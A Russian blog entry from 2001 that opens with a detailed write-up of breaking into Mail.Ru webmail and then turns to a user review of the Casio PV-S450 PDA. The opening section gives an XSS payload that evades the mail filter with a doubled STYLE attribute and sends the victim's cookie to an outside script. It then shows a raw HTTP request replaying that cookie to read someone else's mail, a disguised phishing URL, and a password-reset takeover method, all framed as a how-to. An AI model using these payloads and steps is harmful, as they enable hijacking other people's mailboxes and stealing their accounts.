Крякаем Mail.RU, PV-S450: впечатления и говорящий я



 
Всем привет!

Сегодняшний выпуск проведет мое фото на паспорт, сделанное в нежном возрасте 17 лет. Мне прямо хоть в цирке Монти Пайтона выступать. Надеюсь, у всех браузер настолько продвинутый, что лицо на фотографии видно и рот двигается.

Конечно, в жизни я не такой плоский и черно-белый, и рот у меня двигается, как у всех людей. Да и говорю я громче и меньше.

P.S. Кстати, никто не забыл перевести все часы в доме на зимнее время? Меня сегодня об этом предупредил компьютер. Все-таки и компьютер, иногда, бывает полезен...

Похоже, веб-майл - вещь, дырявая по определению. Производители браузеров надобавляли туда "столько разных штук", что веб-программисты уже просто не успевают вырезать из HTML'а все потенциально опасные теги, стили, скрипты и прочее.

Сегодня буду пороть Mail.Ru. Mail.Ru - один, как я считаю, из лучших почтовых сервисов в России. Люди, которые его делали постарались защитить веб-интерфейс e-mail от всевозможных хитрых редиректов и прочих каверз, встречающихся в HTML-письмах.

Стили, опасные теги, скрипты и вообще активное содержание HTML-письма тщательно обезвреживается буквой "x", забивающей теги и атрибуты. Например, атрибут STYLE, неважно опасен он или нет, превращается в безобидный xSTYLE, а SCRIPT - в xSCRIPT.

Но мне пришлось послать всего три письма, чтобы я смог найти уязвимость, которую проглядели в Mail.Ru. Фокус заключается в простановке у тега второго атрибута STYLE, поставленного вплотную с первым. Тогда анализатор уязвимостей благополучно обезвреживает первый, но не замечает второй. Возможно, я не проверял, так же дело обстоит и с другими блокируемыми атрибутами, например, onMouseOver.


<IMG STYLE=''STYLE="width: expression(var i;if (!i) i = location.href=('http://domain.ru/script.cgi?'+document.cookie))">
 

В принципе, уже этого достаточно, чтобы написать аршинными буквами слово "Мазафака" или заставить исчезнуть нижнюю часть экрана и на этом успокоиться. Но с Internet Explorer (кстати, и не только), если запущен он, конечно, не на Маке, можно делать вещи и поинтереснее.

Например, попытаться получить информацию, достаточную для того, что бы прочитать корреспонденцию атакуемого. Вообще данные по которым сервер узнает пользователя при работе с почтой хранятся в браузерных cookies. И этих данных вполне достаточно, чтобы сервер принял любого, кто владеет этой информации на период сессии с распростертыми объятиями.

Таким образом, достаточно перенаправить пользователя строчкой, подобной той, что я написал выше на некий script.cgi, что бы получить всю необходимую информацию.

Далее, при помощи самодельного proxy, telnet или простого редактирования cookie, скармливаем всю полученную информацию серверу и наслаждаемся чтением. :) Запрос на чтение, в итоге, получится похожим вот на этот:


GET /cgi-bin/msglist?folder=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://win.mail.ru/cgi-bin/start?back=1
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: win.mail.ru
Connection: Keep-Alive
Cookie: Mpop=1004195474:EcczSKdd:mail@mail.ru:; u=P6kBAA3tqABB
 

Я предпочел сформировать полный запрос, но это вовсе не обязательно. Кстати, пользователя после редиректа можно направить на какую-нибудь ложную страницу с просьбой ввести пароль - трюк, по-моему, стандартный и скучный. Если не принять специальных мер, вроде маскирования адреса страницы, вот таким вот, например, способом

http://www.mail.ru@65.21.11.10/вполне_невинная_страница.htm

многие сразу почувствуют подлог. Другой способ - воспользовавшись дырой, узнать как можно больше регистрационных данных этого аккаунта - его секретный вопрос с ответом, дату рождения, имя и тому подобную байду (вся эта информация доступна из меню "настройки"). А потом спокойно ввести ее в форму напоминания пароля. Дальше, остается спокойно поменять пароль на любой понравившийся и пользоваться ящиком в свое удовольствие.

Сегодня увидел в маршрутном автобусе: "бесплатным проездом пользуются только участники ВОВ и дети до 7 лет". Думаю, они ошибаются.

Sergey aka Des прислал ссылку на MP3 с радиорозыгрышем, за что ему большое спасибо. :) Вот тут. 300Кб, жаль, что скорость скачивания очень низкая. Либо сервер стоит на узком канале, либо пользуется бешенной популярностью. :)

Айдын aka Whatever прислал письмо из которого следует, что "Гель для души" - фотомонтаж, который я размещал в прошлом выпуске, не плод моей копии Фотошопа, а суровая реальность. Продается это чудо в Москве под маркой то ли "Роснин", то ли "Роско".

Прошу производителей этого замечательного геля выплатить мне денежку. За рекламу. :) Пусть и неумышленную. :)

PV-S450 (19Kb) Casio PV-S450, называйте его как хотите - органайзер, записная книжка, микрокомпьютер, у меня уже более двух месяцев и, по прошествии этого срока, я захотел поделиться впечатлениями от пользования этим наладонником.

Первое, что я понял - электронные органайзеры мне не подходят, как бы они выглядели и какие бы возможности они не предоставляли. Не лежит у меня душа тыкать пером в PV-S450 или давить в кнопки в Citizen, купленной еще лет пять назад. Так что этот наладонник для меня никакой не органайзер, а вовсе даже, пусть небольшой, компьютер.

Второе. Сделав выбор между Palm и Casio в пользу последнего, я не ошибся. С точки зрения дизайна Casio выглядит куда более выигрышно, чем Palm III или m10x. Насчет V-го ничего не скажу - я его вживую не видел. Одно точно - экран пивишки больше палмовского, примерно на треть, за счет отсутствующей области граффити.

Граффити в Casio нет. Т.е. есть, но в виде отдельной программы и без русификации, что для любителей писать магические знаки на PDA является определенной проблемой. Для меня никакой проблемы тут нет, тем более, что граффити с успехом заменяется графической клавиатурой, которой и осуществляется весь ввод. И вот тут уж никаких проблем с русификацией нет.

Русификация в Casio выполнена на уровне самой PV OS, русифицированных версий уже три - это Миценко ОС, Белка ОС и SSC-ОС. В PV, в отличие от Palm, где русификация выполняется программно и отнимает процессорное время и память, есть возможность обновления операционной системы, так что вы можете загрузить любую из трех. Когда я купил девайс на нем стояла ОС от Белки, сейчас я пользуюсь Миценковской, но собираюсь переходить на SSC.

Другое достоинство пивишки - Flash память. Все программы выполняются в 128-килобайтовой SRAM, но все данные и программы хряняться в 4 магабайтной Flash, что не лучшим образом сказывается на скорости сохранения информации, но является лучшим решением с точки зрения сохранности данных. Вы можете не опасаться, что потеряете информацию, если ваши батарейки сядут. Фирма Palm же рекомендует делать время от времени копию всех данных.

Далее. PV работает от двух пальчиковых батареек AAA *очень* долго. С момента покупки я еще не сменил батарейки ни разу, хотя использую PV довольно интенсивно - часа по два в день. Пальмовцы, рыдайте!

Еще одно достоинство - колесо прокрутки. Колесико удобно располагается под большим пальцем левой или указательным пальцем правой руки. При помощи колесика можно управлять прокруткой или навигацией. Нажимая на колесико можно совершать какие-то, заданные автором программы действия. Например, в программе МиниБук, речь о которой еще пойдет, колесиком можно прокручивать текст, менять книги, делать закладки и так далее.

Подстветка. Сам не сравнивал, но говорят Casio в этом смысле выглядит выйгрышней Palm'a. Теперь о том, в чем Palm "бьет" Casio.

Одним из ограничений PVOS является количество одновременно загружаемых в машинку программ. PVOS умеет работать только с 15-ю. И, хотя мне еще не разу не понадобилось более 10 программ, кого-то, думаю, обрадует факт, что ограничение это можно обойти. При помощи PV addin manager v3.00 можно собрать нужные программы в один или несколько пакетов и "обмануть" операционную систему. PV AM v4.00 позволяет собирать программы в один большой LHA-архив и распаковывать их по мере необходимости, т.е. является первым архиватором программ для PV.

Количество написанного софта. Да, софт для Palm'a поместиться разве что на пару компашек. Софт для Casio - это несколько десятков наименований. Но, спешу развеять все сомнения - софта для Casio вполне достаточно.

Хочется поиграть? Примерно пятьдесят игр (из них три тетриса :), собранные в один архив одним из фенов PV скрасят ваше существование. Встроенные в ОС приложения позволяют вести таблицы a-la MS Excel, делать заметки, вести дела, записывать контакты и делать записи от руки, которые храняться, как картинки. Очень удобно, если надо что-то быстро записать.

MiniBook, написанный Pu Bo, позволяет читать и хранить до девяти книг одновременно, упакованных, примерно, в два раза. Недавно вышла новая версия MiniBook, но я еще не успел ее посмотреть. Кстати, если кУпите PV не забудьте выкачать русский патч для минибука - FixFont, очень рекомендую поставить. Так же нужно попробовать воспользоваться парой форматировщиков текста. Какой из них лучше - решайте сами, я пользуюсь форматировщиком от -pnv-Software (PreBook). Фоматировщик нужен, что бы перевести широкоформатную книгу с какого-нибудь Lib.RU в узкий, хорошо читаемый на небольшом экране (160x160) PV.

Текстовые редакторы. Распространенных два. Первый встроен в саму PVOS. Мне он не нравится - подтормаживает при наборе. Второй - IEdit от Полуэктова, пока находится в стадии бета-тестирования и доработок, но уже является довольно мощным и удобным редактором для PV.

Переводчики. Я пользуюсь двумя, но слышал еще о нескольких. Первый - это весьма известный "СловоЕд", который раньше распространялся с PV в России, а второй - SSC-Dict, который, как я слышал, распространяется с PV теперь. Какой из них лучше сказать затрудняюсь - первый имеет бОльший "словарный запас", второй - более удобный и простой.

Написание собственных программ. Программы для PV обычно пишутся на C или диалектах BASIC. Сишникам Casio предлагает собственную среду разработки, неубодную, но хоть какую-то, тем, кто не хочет учить С или разбираться с API PVOS можно порекомендовать писать на BASIC'e. Их для PV несколько, но получил распространение один - OW-Basic. Это полноценный язык, с поддержкой процедур, модулей и некоторых особенностей PVOS.

Остальные программы на какие-то классы разбивать не хочется, так как нужны они лишь время от времени. Например, есть карты московского и питерского метрополитена, индикаторы разрядки батареек, таймеры, различные системные патчи и так далее.

Начиная разговор про программы, совсем забыл сказать каким образом они попадают в PV. Модели 2x0 и 4x0 работают через кредл, подключаемый к COM-порту, впрочем в природе существуют и USB-шнуры, но это всего лишь COM-через-USB. Владельцам X-серий придется найти в Интернете и прочитать специальную иструкцию по заливке программ. PV-S750 обладает инфракрасным портом, но, к сожалению, еще не продается в России и не имеют русификации, т.е. набирать и читать тексты по-русски там не получится.

У PV есть будущее. Группа российских программистов SSC LG обещает к концу года выпустить пакет SSC-Office, куда войдут две игры, программа для измерения производительности и построения карты памяти, SSC-Bench, которую можно скачать уже сейчас, SSC-Shell, при помощи которой можно будет, при помощи плагинов, работать с текстом любого формата и еще несколько полезных программ.

И еще. Несколько ссылок для тех, кто хотел бы поближе познакомиться с PV-S450. Это сайт, где его можно купить, сайт SSC LG и два сайта, посвященных PV - на русском и английском.

P.S. Я не сравниваю PV с различными изделиями на базе EPOC32, Windows CE и прочими "полноприводными" устройствами, поскольку считаю их просто неполноценными - это уже не PDA, а "недоноутбуки" и по цене и по удобству использования. Тем более, что время работы этих устройств от батарей или аккумуляторов - около пары часов.

Копирайтеры - все сплошь милые, добрые люди. Придумать такое... Сам видел по телевизору. Дедушка, заговаривая внучику зубы, тянется за чипсами, внучик вместо чипсов ставит мышеловку, куда попадает дедушкин палец... Кто хоть раз в детстве пробовал сунуть в мышеловку карандаш должен себе представлять, как должен выглядеть палец, после попадания в мышеловку...

Если кто в детстве был обделен этим полезным опытом, попробуйте проделать его сейчас. Напоминаю, что использовать нужно карандаш, а не палец.

На этом позвольте попрощаться. Пишите!
28 октября 2001 20:55

Ваше имя или адрес блога (можно OpenID):

Текст вашего комментария, не HTML: